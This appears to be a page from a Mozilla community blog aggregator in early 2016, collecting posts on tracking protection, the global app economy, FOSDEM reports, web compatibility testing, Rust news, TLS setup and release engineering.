Please join me now in welcoming Dr. Karim Lakhani to the Board of Directors. He supports our continued investment in open innovation and joins us at the right time, in parallel with the Katharina Borchert’s transition off of our Board of Directors into her role as our new Chief Innovation Officer. We are excited to extend our Mozilla network with these additions, as we continue to ensure that the Internet stays open and accessible to all.


Adam RoachBetter Living through Tracking Protection

There's been a bit of a hullabaloo in the press recently about blocking of ads in web browsers. Very little of the conversation is new, but the most recent round of discussion has been somewhat louder and more excited, in part because of Apple's recent decision to allow web content blockers on the iPhone and iPad.

In this latest round of salvos, the online ad industry has taken a pretty brutal beating, and key players appear to be rethinking long-entrenched strategies. Even the Interactive Advertising Bureau -- who has referred to ad blocking as "robbery" and "an extortionist scheme" -- has gone on record to admit that the Internet ads got so bad that users basically had no choice but to start blocking them.

So maybe things will get better in the coming months and years, as online advertisers learn to moderate their behavior. Past behavior shows a spotty track record in this area, though, and change will come slowly. In the meanwhile, there are some pretty good tools that can help you take back control of your web experience.

How We Got Here

While we probably all remember the nadir of online advertising -- banners exhorting users to "punch the monkey to win $50", epilepsy-inducing ads for online gambling, and out-of-control popup ads for X10 cameras -- the truth is that most ad networks have already pulled back from the most obvious abuses of users' eyeballs. It would appear that annoying users into spending money isn't a winning strategy.

Unfortunately, the move away from hyperkinetic ads to more subtle ones was not a retreat as much as a carefully calculated refinement. Ads nowadays are served by colossal ad networks with tendrils on every site -- and they're accompanied by pretty sophisticated code designed to track you around the web.

The thought process that went into this is: if we can track you enough, we learn a lot about who you are and what your interests are. This is driven by the premise that people will be less annoyed by ads that actually fit their interests; and, at the same time, such ads are far more likely to convert into a sale.

Matching relevant ads to users was a reasonable goal. It should have been a win-win for both advertisers and consumers, as long as two key conditions were met: (1) the resulting system didn't otherwise ruin the web browsing experience, and (2) users who don't want to have their personal movements across the web could tell advertisers not to track them, and have those requests honored.

Neither is true.

Tracking Goes off the Rails

Just like advertisers went overboard with animated ads, pop-ups, pop-unders, noise-makers, interstitials, and all the other overtly offensive behavior, they've gone overboard with tracking.

You hear stories of overreach all the time: just last night, I had a friend recount how she got an email (via Gmail) from a friend that mentioned front-loaders, and had to suffer through weeks of banner ads for construction equipment on unrelated sites. The phenomenon is so bad and so well-known, even The Onion is making fun of it.

Beyond the "creepy" factor of having ad agencies building a huge personal profile for you and following you around the web to use it, user-tracking code itself has become so bloated as to ruin the entire web experience.

In fact, on popular sites such as CNN, code to track users can account for somewhere on the order of three times as much memory usage as the actual page content: a recent demo of the Firefox memory tracking tool found that 30 MB of the 40 MB used to render a news article on CNN was consumed by code whose sole purpose was user tracking.

This drags your browsing experience to a crawl.

Ad Networks Know Who Doesn't Want to be Tracked, But Don't Care.

Under the assumption that advertisers were actually willing to honor user choice, there has been a large effort to develop and standardize a way for users to indicate to ad networks that they didn't want to be tracked. It's been implemented by all major browsers, and endorsed by the FTC.

For this system to work, though, advertisers need to play ball: they need to honor user requests not to be tracked. As it turns out, advertisers aren't actually interested in honoring users' wishes; as before, they see a tiny sliver of utility in abusing web users with the misguided notion that this somehow translates into profits. Attempts to legislate conformance were made several years ago, but these never really got very far.

So what can you do? The balance of power seems so far out of whack that consumers have little choice than to sit back and take it.

You could, of course, run one of any number of ad blockers -- Adblock Plus is quite popular -- but this is a somewhat nuclear option. You're throwing out the slim selection of good players with the bad ones; and, let's face it, someone's gotta provide money to keep the lights on at your favorite website.

Even worse, many ad blockers employ techniques that consume as much (or more) memory and as much (or more) time as the trackers they're blocking -- and Adblock Plus is one of the worst offenders. They'll stop you from seeing the ads, but at the expense of slowing down everything you do on the web.

What you can do

When people ask me how to fix this, I recommend a set of three tools to make their browsing experience better: Firefox Tracking Protection, Ghostery, and (optionally) Privacy Badger. (While I'm focusing on Firefox here, it's worth noting that both Ghostery and Privacy Badger are also available for Chrome.)

1. Turn on Tracking Protection

Firefox Tracking Protection is automatically activated in recent versions of Firefox whenever you enter "Private Browsing" mode, but you can also manually turn it on to run all the time. If you go to the URL bar and type in "about:config", you'll get into the advanced configuration settings for Firefox (you may have to agree to be careful before it lets you in). Search for a setting called "privacy.trackingprotection.enabled", and then double-click next to it where it says "false" to change it to "true." Once you do that, Tracking Protection will stay on regardless of whether you're in private browsing mode.

Firefox tracking protection uses a curated list of sites that are known to track you and known to ignore the "Do Not Track" setting. Basically, it's a list of known bad actors. And a study of web page load times determined that just turning it on improves page load times by a median of 44%.

2. Install and Configure Ghostery

There's also an add-on that works similar to Tracking Protection, called Ghostery. Install it from, and then go into its configuration (type "about:addons" into your URL bar, and select the "Preferences" button next to Ghostery). Now, scroll down to "blocking options," near the bottom of the page. Under the "Trackers" tab, click on "select all." Then, uncheck the "widgets" category. (Widgets can be used to track you, but they also frequently provide useful functions for a web page: they're a mixed bag, but I find that their utility outweighs their cost).

Ghostery also uses a curated list, but it's far more aggressive in what it considers to be tracking. It also allows you fine-grained control over what you block, and lets you easily whitelist sites, if you find that they're not working quite right with all the potential trackers removed.

Poke around at the other options in there, too. It's really a power-users tracker blocker.

3. Optionally, Install Privacy Badger

Unlike tracking protection and Ghostery, Privacy Badger isn't a curated list of known trackers. Instead, it's a tool that watches what webpages do. When it sees behavior that could be used to track users across multiple sites, it blocks that behavior from ever happening again. So, instead of knowing ahead of time what to block, it learns what to block. In other words, it picks up where the other two tools leave off.

This sounds really good on paper, and does work pretty well in practice. I ran with Privacy Badger turned on for about a month, with mostly good results. Unfortunately, its "learning" can be a bit aggressive, and I found that it broke sites far more frequently than Ghostery. So the trade-off here: if you run Privacy Badger, you'll have much better protection against tracking, but you'll also have to be alert to the kinds of defects that it can introduce, and go turn it off when it interferes with what you're trying to do. Personally, I turned it off a few months ago, and haven't bothered to reactivate it yet; but I'll be checking back periodically to see if they've tuned their algorithms (and their yellow-list) to be more user-friendly.

If you're interested in giving it a spin, you can download Privacy Badger from the website.

The Mozilla BlogMozilla, Caribou Digital Release Report Exploring the Global App Economy

Mozilla is a proud supporter of research carried out by Caribou Digital, the UK-based think tank dedicated to building sustainable digital economies in emerging markets. Today, Caribou has released a report exploring the impact of the global app economy and international trade flows in app stores. You can find it here.

The findings highlight the app economy’s unbalanced nature. While smartphones are helping connect billions more to the Web, the effects of the global app economy are not yet well understood. Key findings from our report include:

  • Most developers are located in high-income countries. The geography of where app developers are located is heavily skewed toward the economic powerhouses, with 81% of developers in high-income countries — which are also the most lucrative markets. The United States remains the dominant producer, but East Asia, fueled by China, is growing past Europe.
  • Apps stores are winner-take-all. The nature of the app stores leads to winner-take-all markets, which skews value capture even more heavily toward the U.S. and other top producers. Conversely, even for those lower-income countries that do have a high number of developers — e.g., India — the amount of value capture is disproportionately small to the number of developers participating.
  • The emerging markets are the 1% — meaning, they earn 1% of total app economy revenue. 95% of the estimated value in the app economy is captured by just 10 countries, and 69% of the value is captured by just the top three countries. Excluding China, the 19 countries considered low- or lower-income accounted for only 1% of total worldwide value.
  • Developers in low-income countries struggle to export to the global stage. About one-third of developers in the sample appeared only in their domestic market. But this inability to export to other markets was much more pronounced for developers in low-income countries, where 70% of developers were not able to export, compared to high-income countries, where only 29% of developers were not able to export. For comparison, only 3% of U.S. developers did not export.
  • U.S. developers dominate almost all markets. On average, U.S. apps have 30% of the market across the 37 markets studied, and the U.S. is the dominant producer in every market except for China, Japan, South Korea, and Taiwan.

Mozilla is proud to support Caribou Digital’s research, and the goal of working toward a more inclusive Internet, rich with opportunity for all users. Understanding the effects of the global app economy, and helping to build a more inclusive mobile Web, are key. We invite readers to read the full report here, and Caribou Digital’s blog post here.


Several members of the QA team attended FOSDEM this year, and gave presentations on a variety of subjects – both the BuddyUp Pilot Project and FxOS Automation were presented. All of the FOSDEM presentations were recorded and will eventually be available online. Mozilla also had a booth, and we had a group of community volunteers who volunteered to sit at the booth and answer questions. There was a VR display as well as some FxOS devices on display.

You can read more about the event here.

Pictures of the event are here.

Andrew SutherlandAn email conversation summary visualization

We’ve been overhauling the Firefox OS Gaia Email app and its back-end to understand email conversations.  I also created a react.js-based desktop-ish development UI, glodastrophe, that consumes the same back-end.

My first attempt at summaries for glodastrophe was the following:

old summaries; 3 message tidbits

The back-end derives a conversation summary object from all of the messages that make up the conversation whenever any message in the conversation changes.  While there are some things that are always computed (the number of messages in the conversation, whether there are any unread messages, any starred/flagged messages, etc.), the back-end also provides hooks for the front-end to provide application logic to do its own processing to meet its UI needs.

In the case of this conversation summary, the application logic finds the first 3 unread messages in the conversation and stashes their date, author, and extracted snippet (if any) in a list of “tidbits”.  This also is used to determine the height of the conversation summary in the conversation list.  (The virtual list is aware of a quantized coordinate space where each conversation summary object is between 1 and 4 units high in this case.)

While this is interesting because it’s something Thunderbird’s thread pane could not do, it’s not clear that the tidbits are an efficient use of screen real-estate.  At least not when the number of unread messages in the conversation exceeds the 3 we cap the tidbits at.

time-based thread summary visualization

But our app logic can actually do anything it wants.  It could, say, establish the threading relationship of the messages in the conversation to enable us to make a highly dubious visualization of the thread structure in the conversation as well as show the activity in the conversation over time.  Much like the visualization you already saw before you read this sentence.  We can see the rhythm of the conversation.  We can know whether this is a highly active conversation that’s still ongoing, or just that someone has brought back to life.

Here’s the same visualization where we still use the d3 cluster layout but don’t clobber the x-position with our manual-quasi-logarithmic time-based scale:

the visualization without time-based x-positioning

Disclaimer: This visualization is ridiculously impractical in cases where a conversation has only a small number of messages.  But a neat thing is that the application logic could decide to use textual tidbits for small numbers of unread and a cool graph for larger numbers.  The graph’s vertical height could even vary based on the number of messages in the conversation.  Or the visualization could use thread-arcs if you like visualizations but want them based on actual research.

If you’re interested in the moving pieces in the implementation, they’re here:

QMODavid Weir: friendly with belief in team work and contribution

David Weir has been involved with Mozilla since 2009. He is from Glasgow, Scotland where he has recently graduated from Glasgow Kelvin College with skills in digital media. In his spare time, he volunteers at local organisations that aim to promote the quality of life in Glasgow’s East End community.

David is from Scotland in Europe.

David is from Scotland in Europe.

Hi David! How did you discover the Web?

I used to write letters the old-fashioned way with ink and paper till I got an email address and discovered the Internet. I started going online for stuff like applying for jobs. That’s how I discovered the Web.

How did you hear about Mozilla?

I used Internet Explorer before I found out about Firefox from an advertisement on Facebook.

How and why did you start contributing to Mozilla?

I was a newbie Firefox user and I liked it. As I got to understand it better, I decided to help out other users on live chat. I became a part of SUMO. To date, I’ve answered 39 questions, written 27 documents and earned 3 badges on SUMO.

Have you contributed to any other Mozilla projects in any other way?

I am a community contributor to the QA team. I actively participate in discussions during team meetings, email threads, and IRC. I’ve recently arranged testdays for Windows 10, Windows Nightly 64-bit, Firefox for Android and Firefox for Desktop.

I contribute code to SuMoBot, an IRC bot in Mozilla’s #SuMo IRC channel.

I’m part of Firefox Friends, a team of social-sharers and word-spreaders to promote Firefox. I help run the Mozilla contributor group on Facebook, and I keep an eye out for Mozilla-related news spreading around social channels.

I am a Mozilla Rep and actively recruit Mozillians.

What’s the contribution you’re the most proud of?

I have some disability in the form of visual impairment and autism; my hand-eye co-ordination is not perfect. I help to make the web more accessible for people with disability. I look at Mozilla websites and if I find things like the text is too dark to read, I notify the developers to make fixes for better accessibility. See bugs 721518, 746251, 770248 and 775318.

You belong to the Mozilla UK community. Please tell us more about your community. Is there anything you find particularly interesting or special about it?

The Mozilla UK community consists of a small number of employees and volunteers scattered around the United Kingdom. There is a Community Space in London. Every year in November, community members help to host the Mozilla Festival. Since only a few employees work in the London office, most meetings happen online. You can find us on the #uk IRC channel. Community discussion happens on Discourse.

A recent landmark achievement for the UK community was the rollout of the en-GB locale for Mozilla’s web properties like,,,, and the main Mozilla website, I personally contributed to the (en-GB) localization of See bugs 1190535 and 1188470.

There is a Scottish community within the larger UK community that can download Mozilla products localized in Gaelic language and discuss support issues on the Gaelic language discussion forum Fòram na Gàidhlig.

What advice would you give to someone who is new and interested in contributing to Mozilla?

Mozilla is one of the most friendly communities I have ever volunteered with. The whole staff is behind you.

If you had one word or sentence to describe Mozilla, what would it be?

Lots of stuff happening – get involved!

What exciting things do you envision for you and Mozilla in the future?

A Scottish community space would be nice.

The Mozilla QA and SUMO teams would like to thank David Weir for his contributions over the past 7 years.

David has contributed to the Mozilla project for a few years now. I’ve frequently had the opportunity to interact with him through IRC. We would also get to say “hi!” to him face-to-ace every so often, because he would attend our weekly team meetings throughteleconferencing. I remember he initially started out attending “testdays” where he would help us test new features in Firefox. Later, his collaboration evolved into organizing his own testdays to address issues he identified as problematic. He’s been a very enthusiastic contributor, and he’s never been shy about pointing out when and where we could be doing better for example, in terms of sharing documentation, or any other information that could be helpful to other contributors. He has made a memorable impression on me and enriched my Mozilla experience, and I hope he keeps participating in the project. – Juan Carlos Becerra

Every team at Mozilla would be lucky to have a contributor like David (IRC nick satdav). He’s committed, the first to know about anything new going on in our social contributor community, and always open with ideas for how we can improve our programs. – Elizabeth Hull

Over the last few years satdav has stayed on top of many support and QA issues, often bringing new bugs that affect the user community to developer attention. That’s so helpful! He shows up to a wide range of Firefox meetings and irc channels, and has a good idea of who to ask to get more information on a bug. Because he has a broad and general interest and is not afraid to ask questions, he also sometimes works as a cross team communicator letting people know what’s going on in other meetings or discussions. I think of him as one of those people who in a science fiction future, would be in a spaceship mission control center with 20 monitors, listening on many channels at once. It has been cool to see his enthusiasm on Mozilla projects and to see his knowledge deepen! – Liz Henry

Karl DubostTesting Google Search On Gecko With Different UA Strings

Google is serving very different versions of its services to individual browsers and devices. A bit more than one year ago, I had listed some of the bugs (btw, I need to go through this list again), Firefox was facing when accessing Google properties. Sometimes, we were not served the tier 1 experience that Chrome was receiving. Sometimes it was just completely broken.

We have an open channel of discussions with Google. Google is also not a monolithic organization. Some services have different philosophy with regards to fixing bugs or Web compatibility issues. The good news is that it is improving.

Three Small Important Things About Google Today

  1. mike was looking for usage of -webkit-mask-* CSS property on the Web. I was about to reply "Google search!" which was sending it to Chrome browser but decided to look at the bug again. They were using -webkit-mask-image. To my big surprise, they switched to an SVG icon. Wonderful!
  2. So it was time for me to testing one more time Google Search on Gecko with Firefox Android UA and Chrome UA. See below.
  3. Tantek started some discussion in the CSS Working Group about Web compatibility issues, including one about getting the members of the CSS Working Group to fix their Web properties.

Testing Google Search on Gecko and Blink

For each test, the first two screenshots are on the mobile device itself (Chrome, then Firefox). The third screenshot shows the same site with a Chrome user agent string but as displayed on Gecko on Desktop. Basically, this 3rd one is testing if Google was sending the same version to Firefox on Android that they serve to Chrome, would it work?

Home page

We reached the home page of Google.

home page

Home page - search term results

We typed the word "Japan".

home page with search term

Home page - scrolling down

We scrolled down a bit.

scrolling down the page

Home page - bottom

We reached the bottom of the page.

Bottom of the page

Google Images with the search term

We go back to the top of the page and tap on Images menu.

Accessing Google image

Google Images when image has been tapped

We tap on the first image.

focus on the image


We are not there yet the issue is complex, because of the big number of versions which are served to different browsers/devices, but definitely there is progress. At first sight, the version sent to Chrome is compatible with Firefox. We would need to test with being logged too and all the corner cases of the tools and menus. But it's a lot, lot, better that what it was used to be in the past. We have never been that close from an acceptable user experience.

Daniel StenbergMy HTTP/2 slide updates

My first HTTP/2 talk of the year I did for OWASP Stockholm on January 27th, and I subsequently updated my public slide set:

On slideshare here: Http2
I then did a shorter talk at FOSDEM 2016 on January 30th that I called “an HTTP/2 update”. In 25 rushed minutes I presented these slides:

This Week In RustThis Week in Rust 116

Hello and welcome to another issue of This Week in Rust! Rust is a systems language pursuing the trifecta: safety, concurrency, and speed. This is a weekly summary of its progress and community. Want something mentioned? Tweet us at @ThisWeekInRust or send us an email! Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub. If you find any errors in this week's issue, please submit a PR.

This week's edition was edited by: nasa42, brson, and llogiq.

Updates from Rust Community

News & Blog Posts

Notable New Crates & Project Updates

Updates from Rust Core

114 pull requests were merged in the last week.

See the triage digest and subteam reports for more details.

Notable changes

New Contributors

  • Ali Clark
  • Daan Sprenkels
  • ggomez
  • tgor
  • Thomas Wickham
  • Tomasz Miąsko
  • Vincent Esche

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

Final Comment Period

Every week the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now. This week's FCPs are:

New RFCs

Upcoming Events

If you are running a Rust event please add it to the calendar to get it mentioned here. Email Erick Tryzelaar or Brian Anderson for access.

fn work(on: RustProject) -> Money

Tweet us at @ThisWeekInRust to get your job offers listed here!

Crate of the Week

This week's Crate of the Week is herbie-lint, a miraculous compiler plugin to check the numerical stability of floating-point operations in the code. Another reason to have a nightly Rust handy.

Thanks to redditor protestor for the suggestion.

Submit your suggestions for next week!

Quote of the Week

imo: the opinionated version of mio

durka42 on #rust

Thanks to Steve Klabnik for the suggestion.

Submit your quotes for next week!

Daniel, HTTPS and h2

I previously mentioned my slow-moving plan to get all my sites and servers onto HTTPS and HTTP/2. As of now, I’ve started to activate HTTPS for sites that run on our server and that I admin. First out in the list of sites are this host ( and the curl web site ( There are plenty more to setup but the plan is to have the most important ones on HTTPS really soon.

If you experience problems with any of these, let me know. The long-term plan involves going HTTPS-only for all of them.

Ludovic HirlimannFosdem 2016 day 2

Day 2 was a bit different than day 1, has I was less tired. It started by me visiting a few booths in order to decorate my bag and get a few more T-shirts, thanks to wiki-mania, Apache, Open Stack. I got the mini-port to VGA cable I had left in the conference room and then  headed for the conferences.

The first one was “Active supervision and monitoring with Salt, Graphite and Grafana“ was interesting because I knew nothing about any of these, except for graphite, but I knew so little that I learned a lot.

The second one titled “War Story: Puppet in a Traditional Enterprise” was someone implementing puppet at an enterprise scale in a big company. It reminded me all the big company I had consulted to a few years back - nothing surprising. It was quiet interesting anyway.

The Third talk I attend was about hardening and securing configuration management software. It was more about general principle than an howto. Quite interesting specially the link given at the end of the documentation and the idea to remove ssh if possible on all servers and enable it thru conf. management to investigate issues. I didn’t learn much but it was a good refresher.

I then attend a talk in a very small room that was packed packed packed , about mapping with your phone. As I’ve started contributing to OSM, it was nice to listen and discover all the other apps that I can run on my droid phone in order to add data to the maps. I’ll probably share that next month at the local OSM meeting that got announced this week-end.

Last but not least I attended the key signing party. According to my paperwork, I’ll have sot sign twice 98 keys (twice because I’m creating a new key).

I’ve of course added a few pictures to my Fosdem set.

Kartikaya GuptaFrameworks vs libraries (or: process shifts at Mozilla)

At some point in the past, I learned about the difference between frameworks and libraries, and it struck me as a really important conceptual distinction that extends far beyond just software. It's really a distinction in process, and that applies everywhere.

The fundamental difference between frameworks and libraries is that when dealing with a framework, the framework provides the structure, and you have to fill in specific bits to make it apply to what you are doing. With a library, however, you are provided with a set of functionality, and you invoke the library to help you get the job done.

It may not seem like a very big distinction at first, but it has a huge impact on various properties of the final product. For example, a framework is easier to use if what you are trying to do lines up with the goal the framework is intended to accomplish. The only thing you need to do is provide (or override) specific things that you need to customize, and the framework takes care of the rest. It's like a builder building your house, and you picking which tile pattern you want for the backsplash. With libraries there's a lot more work - you have a Home Depot full of tools and supplies, but you have to figure out how to put them together to build a house yourself.

The flip side, of course, is that with libraries you get a lot more freedom and customizability than you do with frameworks. With the house analogy, a builder won't add an extra floor for your house if it doesn't fit with their pre-defined floorplans for the subdivision. If you're building it yourself, though, you can do whatever you want.

The library approach makes the final workflow a lot more adaptable when faced with new situations. Once you are in a workflow dictated by a framework, it's very hard to change the workflow because you have almost no control over it - you only have as much control as it was designed to let you have. With libraries you can drop a library here, pick up another one there, and evolve your workflow incrementally, because you can use them however you want.

In the context of building code, the *nix toolchain (a pile of command-line tools that do very specific things) is a great example of the library approach - it's very adaptable as you can swap out commands for other commands to do what you need. An IDE, on the other hand, is more of a framework. It's easier to get started because the heavy lifting is taken care of, all you have to do is "insert code here". But if you want to do some special processing of the code that the IDE doesn't allow, you're out of luck.

An interesting thing to note is that usually people start with frameworks and move towards libraries as their needs get more complex and they need to customize their workflow more. It's not often that people go the other way, because once you've already spent the effort to build a customized workflow it's hard to justify throwing the freedom away and locking yourself down. But that's what it feels like we are doing at Mozilla - sometimes on purpose, and sometimes unintentionally, without realizing we are putting on a straitjacket.

The shift from Bugzilla/Splinter to MozReview is one example of this. Going from a customizable, flexible tool (attachments with flags) to a unified review process (push to MozReview) is a shift from libraries to frameworks. It forces people to conform to the workflow which the framework assumes, and for people used to their own customized, library-assisted workflow, that's a very hard transition. Another example of a shift from libraries to frameworks is the bug triage process that was announced recently.

I think in both of these cases the end goal is desirable and worth working towards, but we should realize that it entails (by definition) making things less flexible and adaptable. In theory the only workflows that we eliminate are the "undesirable" ones, e.g. a triage process that drops bugs on the floor, or a review process that makes patch context hard to access. In practice, though, other workflows - both legitimate workflows currently being used and potential improved workflows get eliminated as well.

Of course, things aren't all as black-and-white as I might have made them seem. As always, the specific context/situation matters a lot, and it's always a tradeoff between different goals - in the end there's no one-size-fits-all and the decision is something that needs careful consideration.

Marcia KnousFirefox OS QA at FOSDEM 2016

Despite the fact I have been around the Mozilla project for some time, I never did get the opportunity to attend the FOSDEM conference. This year I was fortunate enough to not only attend, but also to present along with Ioana Chiorean at FOSDEM in the Mozilla Developer Room. And I was in good company: Johan Lorenzo and Martijn Wargers of the QA team also presented a great Automation Session on Saturday.    Martijn Wargers and Johan Lorenzo presenting at FOSDEM 2016   There were several things

Ludovic HirlimannFosdem 2016 day 1

This year I’m attending fosdem, after skipping it last year. It’s good to be back even if I was very tired when I arrived yesterday night and managed to visit three of Brussels train station. I was up early and the indications in bus 71 where fucked up so it took me a short walk under some rain to get to the campus - but I made it early and was able to take interesting empty pictures.

The first talk I attended was about MIPS for the embedded world. It was interesting for some tidbids, but felt more like a marketing speech to use MIPS on future embedding project.

After that I wanders and found a bunch of ex-joosters and had very interesting conversation with all of them.

I delivered my talk in 10 minutes and then answered question for the next 20 minutes.

The http2 talk was interesting and the room was packed. But probably not deep enough for me. Still I think we should think about enabling http/2 on

I left to get some rest after talking to otto about block chain and bitcoins.

Mike HommeyEnabling TLS on this blog

Long overdue, I finally enabled TLS on this blog. It went almost like a breeze.

I used simp_le to get the certificate from Let’s Encrypt, along Mozilla’s Web Server Configuration generator. SSL Labs now reports a rating of A+.

I just had a few issues:

  • I had some hard-coded http:// links in my wordpress theme, that needed changes,
  • Since my wordpress instance is reverse-proxied and the real server not behind HTTPS, I had to adjust the wordpress configuration so that it doesn’t do an infinite redirect loop,
  • Nginx’s config for multiple virtualhosts needs SSL configuration to be repeated. Fortunately, one can use include statements,
  • Contrary to the suggested configuration, setting ssl_session_tickets off; makes browsers unhappy (at least, it made my Firefox unhappy, with a SSL_ERROR_RX_UNEXPECTED_NEW_SESSION_TICKET error message).

I’m glad that there are tools helping to get a proper configuration of SSL. It is sad, though, that the defaults are not better and that we still need to tweak at all. Setting where the certificate and the private key files are should, in 2016, be the only thing to do to have a secure web server.

Chris CooperRelEng & RelOps Weekly Highlights - January 29, 2016

Well, that was a quick month! Time flies when you’re having fun…or something.

Modernize infrastructure:

In an effort to be more agile in creating and/or migrating webapps, Releng has a new domain name and SSL wildcard! The new domain ( is setup for management under inventory and an ssl endpoint has been established in Heroku. See

Improve CI pipeline:

Coop (hey, that’s me!) re-enabled partner repacks as part of release automation this week, and was happy to see the partner repacks for the Firefox 44 release get generated and published without any manual intervention. Back in August, we moved the partner repack process and configuration into github from mercurial. This made it trivially easy for Mozilla partners to issue a pull request (PR) when a configuration change was needed. This did require some re-tooling on the automation side, and we took the opportunity to fix and update a lot of partner-related cruft, including moving the repack hosting to S3. I should note that the EME-free repacks are also generated automatically now as part of this process, so those of you who prefer less DRM with your Firefox can now also get your builds on a regular basis.


One of the main reasons why build promotion is so important for releng and Mozilla is that it removes the current disconnect between the nightly/aurora and beta/release build processes, the builds for which are created in different ways. This is one of the reasons why uplift cycles are so frequently “interesting” - build process changes on nightly and aurora don’t often have an existing analog in beta/release. And so it was this past Tuesday when releng started the beta1 process for Firefox 45. We quickly hit a blocker issue related to gtk3 support that prevented us from even running the initial source builder, a prerequisite for the rest of the release process. Nick, Rail, Callek, and Jordan put their heads together and quickly came up with an elegant solution that unblocked progress on all the affected branches, including ESR. In the end, the solution involved running tooltool from within a mock environment, rather than running it outside the mock environment and trying to copy relevant pieces in. Thanks for the quick thinking and extra effort to get this unblocked. Maybe the next beta1 cycle won’t suck quite as much! The patch that Nick prepared ( is now in production and being used to notify users on unsupported versions of GTK why they can’t update. In the past, they would’ve simply received no update with no information as to why.


Dustin made security improvements to TaskCluster, ensuring that expired credentials are not honored.

We had a brief Balrog outage this morning [Fri Jan 29]. Balrog is the server side component of the update system used by Firefox and other Mozilla products. Ben quickly tracked the problem down to a change in the caching code. Big thanks to mlankford, Usul, and w0ts0n from the MOC for their quick communication and help in getting things back to a good state quickly.


On Wednesday, Dustin spoke at Siena College, holding an information session on Google Summer of Code and speaking to a Software Engineering class about Mozilla, open source, and software engineering in the real world.

See you next week!

Yunier José Sosa VázquezVisualizando lo invisible

Esta es una traducción del artículo original publicado en el blog The Mozilla Blog. Escrito por Jascha Kaykas-Wolff .

Hoy en día, la privacidad y las amenazas como el seguimiento invisible de terceros en la Web en línea parecen ser muy abstractas. Muchos de nosotros no somos conscientes de lo que está pasando con nuestros datos en línea o nos sentimos impotentes porque no sabemos qué hacer. Cada vez más, Internet se está convirtiendo en una casa de cristal gigante donde tu información personal está expuesta a terceros que la recogen y utilizan para sus propios fines.

Recientemente hemos lanzado Navegación privada con la protección de seguimiento en Firefox – una característica que se centra en proporcionar a cualquier persona que utilice Firefox una elección significativa frente a terceros en la Web que podrían recolectar sus datos sin su conocimiento o control. Esta es una característica que se ocupa de la necesidad de un mayor control sobre la privacidad en línea, pero también está conectada a un debate permanente e importante en torno a la preservación de un ecosistema Web sano, abierto y sostenible y los problemas y las posibles soluciones a la pregunta sobre los contenidos bloqueados.

La casa de cristal

A principios de este mes nos dedicamos a un evento de tres días sobre la privacidad en línea en Hamburgo, Alemania. Hoy en día, nos gustaría compartir algunas impresiones del evento y también un experimento que filmamos en la famosa calle Reeperbahn.

¿Nuestro experimento?

Nos dispusimos a ver si podíamos explicar algo que no es fácilmente visible, la privacidad en línea, de una manera muy tangible. Hemos construido un apartamento totalmente equipado con todo lo necesario para disfrutar de un corto viaje a la perla del norte de Alemania. Hicimos el apartamento a disposición de los diferentes viajeros que llegan a pasar la noche. Una vez que se conectaron a Wi-Fi de la vivienda, se eliminaron todas las paredes, dejando al descubierto los viajeros a los espectadores y la conmoción externa causados ​​cuando su información privada resultó ser pública.

Las respuestas de los viajeros ante lo que les sucede resultan impactantes.

En video: mira lo que sucede con nuestros datos

Dicho esto, nos ayudamos con algunos actores para realzar con más dramatismo una referencia no tan sutil de lo que le puede pasar a sus datos cuando usted no está prestando atención. ¡Bienvenido a la casa de cristal!

Desde Mozilla Hispano instamos a todos los lectores a que sepan que son usuarios que deben de informarse para poder reflexionar sobre lo que ocurre cuando ingresan a la Web. Tomar el control requiere de tener herramientas e información, y para lograr ésto los usuarios deben de volverse autogestivos, sujetos conscientes de la realidad que viven dentro del entorno que circundan para poder tomar cartas en el asunto.

Mientras que los resultados del experimento pretenden educar y generar conciencia, también capturamos pensamientos y sentimientos de los participantes después de la intervención. Estas son algunas de las reacciones más conmovedoras:

De izquierda a derecha: Lars Reppesgaard (Autor, "El Imperio Google"), Svenja Teichmann (crowdmedia), Federico Richter (Presidente de la Fundación de Protección de Datos de Alemania) y Winston Bowden (Sr. Gerente de Marketing de Producto de Firefox)

De izquierda a derecha: Lars Reppesgaard (Autor, “El Imperio Google”), Svenja Teichmann (crowdmedia), Federico Richter (Presidente de la Fundación de Protección de Datos de Alemania) y Winston Bowden (Sr. Gerente de Marketing de Producto de Firefox)

Discutiendo el Estado de control de datos en la Web hoy

En los dos días que le siguieron a la intervención, en la misma casa de vidrio, expertos en privacidad y tecnología alemana, el grupo Digital Media Women de Hamburgo, la comunidad Mozilla y personas interesadas en el tema de la privacidad en línea se reunieron para discutir el “Estado de los datos y control en la Web”.

Empezamos con una mesa redonda. Moderada por Svenja Teichmann, fundador y director general de crowdmedia (actualmente Sequel) y expertos en protección de datos alemanes. La protección de la privacidad en línea y preguntas como “¿Qué es privado hoy en día?” fueron los temas que se debatieron mientras que los transeúntes podían mirar a través de las paredes de cristal.

Federico Richter señaló la incertidumbre del usuario: “En la web no nos damos cuenta de qué nos está viendo. Y muchas personas no pueden proteger su privacidad en línea, ya que no tienen características fáciles de usar”– Lars Reppesgaard no está completamente en contra del rastreo por Internet pero piensa que los usuarios deben tener una opción. “Si desea que la tecnología lo ayude, es necesario que la misma recoja algunos datos a veces. Pero para la mayoría de los usuarios no es obvio cuando y por quién se realiza éste seguimiento”. Sobre la nueva función de seguimiento de protección en la navegación privada en Firefox, Winston Bowden enfatizó:

“No somos un enemigo de la publicidad en línea. Es una fuente legítima de ingresos y garantiza el contenido altamente emocionante en la Web. Pero si el seguimiento de los usuarios es sin que ellos lo sepan o aún, cuando estén en contra, este tipo de rastreo no va a funcionar. La web abierta y libre es un activo valioso, que debemos proteger. Los usuarios tienen que tener el control de sus datos”.

Educación y Participación

Por último, los miembros de la comunidad Mozilla alemanes se unieron al evento para informar y educar a la gente sobre cómo Firefox puede ayudar a los usuarios a obtener el control sobre su experiencia en línea. Explicaron el fondo y la génesis de la Protección contra rastreo, pero también mostraron herramientas como Lightbeam y hablaron de Smart On Privacy y sobre Web Literacy, con la intención de ofrecer puntos de referencia para tener un mayor conocimiento de cómo funciona la Web.


Gracias a todos los que trabajaron detrás de las escenas y/o vinieron a Hamburgo e hicieron lo posible para que este evento funcionara. Apreciamos su ayuda en pos de educar y abogar para que la gente sepa acerca de su elección y control sobre la privacidad en línea.

Por último, si te interesa el tema puedes compartir este artículo en tus redes sociales para que todos estén al tanto de lo que pasa. Así podrás unirte al mes de la privacidad.

Fuente: Mozilla Hispano

Daniel GlazmanGoogle, and blacklists

Several painful things happened to yesterday... In chronological order:

